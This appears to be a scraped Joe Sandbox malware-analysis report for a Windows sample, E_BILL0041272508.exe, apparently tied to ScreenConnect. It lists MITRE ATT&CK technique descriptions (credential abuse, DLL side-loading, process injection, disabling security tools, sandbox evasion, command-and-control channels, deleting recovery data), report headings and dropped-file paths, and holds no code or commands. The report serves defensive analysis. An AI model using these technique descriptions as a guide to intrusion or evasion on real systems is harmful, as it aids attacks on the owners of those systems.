Source File: 00000009.00000002.2440963652.00007FFD34A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34A80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ffd34a80000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 645fb81455c185ba2da7f8d5d77bf8172e4d73ee1857f73a79be1eefd4a90f9f
Instruction ID: 11486cd258e63b8acec188cf71e767ca67ff107bba04df119e6502b705a9a9c9
Opcode Fuzzy Hash: 645fb81455c185ba2da7f8d5d77bf8172e4d73ee1857f73a79be1eefd4a90f9f
Instruction Fuzzy Hash: 71B092A0F09E0A8A92B89E0900E423928D18F696017A0463EC10ED26A6CD6C798562C2

Description:	Adversaries may obtain and abuse credentials of existing accounts as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Compromised credentials may be used to bypass access controls placed on various resources on systems within the network and may even be used for persistent access to remote systems and externally available services, such as VPNs, Outlook Web Access, network devices, and remote desktop.Compromised credentials may also grant an adversary increased privilege to specific systems or access to restricted areas of the network. Adversaries may choose not to use malware or tools in conjunction with the legitimate access those credentials provide to make it harder to detect their presence.
Tactics:	Defense Evasion, Initial Access, Persistence, Privilege Escalation
Data Sources:	Logon Session: Logon Session Creation, Logon Session: Logon Session Metadata, User Account: User Account Authentication
Platforms:	Azure AD, Containers, Google Workspace, IaaS, Linux, macOS, Network, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Network, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically may require being a member of an admin or otherwise privileged group on the remote system.
Tactics:	Execution, Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, Container: Container Creation, File: File Creation, File: File Modification, Process: Process Creation, Scheduled Job: Scheduled Job Creation
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may create or modify Windows services to repeatedly execute malicious payloads as part of persistence. When Windows boots up, it starts programs or applications called services that perform background system functions.Windows service configuration information, including the file path to the service's executable or recovery programs/commands, is stored in the Windows Registry.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, Driver: Driver Load, File: File Metadata, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Creation, Service: Service Creation, Service: Service Modification, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use bootkits to persist on systems. Bootkits reside at a layer below the operating system and may make it difficult to perform full remediation unless an organization suspects one was used and can act accordingly.
Tactics:	Defense Evasion, Persistence
Data Sources:	Drive: Drive Modification
Platforms:	Linux, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Active Directory: Active Directory Object Modification, Command: Command Execution, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Metadata
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may install a root certificate on a compromised system to avoid warnings when connecting to adversary controlled web servers. Root certificates are used in public key cryptography to identify a root certificate authority (CA). When a root certificate is installed, the system or application will trust certificates in the root's chain of trust that have been signed by the root certificate.Certificates are commonly used for establishing secure TLS/SSL communications within a web browser. When a user attempts to browse a website that presents a certificate that is not trusted an error message will be displayed to warn the user of the security risk. Depending on the security settings, the browser may not allow the user to establish a connection to the website.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify file time attributes to hide new or changes to existing files. Timestomping is a technique that modifies the timestamps of a file (the modify, access, create, and change times), often to mimic files that are in the same folder. This is done, for example, on files that have been modified or created by the adversary so that they do not appear conspicuous to forensic investigators or file analysis tools.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata, File: File Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the Windows Registry to hide configuration information within Registry keys, remove information as part of cleaning up, or as part of other techniques to aid in persistence and execution.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use hidden users to hide the presence of user accounts they create or modify. Administrators may want to hide users when there are many user accounts on a given system or if they want to hide their administrative or other management accounts from other users.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Modification, Process: Process Creation, User Account: User Account Creation, User Account: User Account Metadata, Windows Registry: Windows Registry Key Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report E_BILL0041272508.exe

Overview

General Information

Detection

Compliance

Signatures

Classification

Process Tree

Malware Configuration

Yara Signatures

Dropped Files

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Cryptography

Privilege Escalation

Compliance

Spreading

Networking

E-Banking Fraud

Spam, unwanted Advertisements and Ransom Demands

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

Private

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\ProgramData\Microsoft\Network\Downloader\edb.chk

C:\ProgramData\Microsoft\Network\Downloader\edb.log

C:\ProgramData\Microsoft\Network\Downloader\qmgr.db

C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm

C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506

C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\C56C4404C4DEF0DC88E5FCD9F09CB2F1

C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\C8E534EE129F27D55460CE17FD628216_1130D9B25898B0DB0D4F04DC5B93F141

C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F2E248BEDDBB2D85122423C41028BFD4

C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506

Windows Analysis Report
E_BILL0041272508.exe

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using a protocol and port pairing that are typically not associated. For example, HTTPS over port 8088or port 587as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may delete or remove built-in data and turn off services designed to aid in the recovery of a corrupted system to prevent recovery.This may deny access to available backups and recovery options.
Tactics:	Impact
Data Sources:	Cloud Storage: Cloud Storage Deletion, Command: Command Execution, File: File Deletion, Process: Process Creation, Service: Service Metadata, Snapshot: Snapshot Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre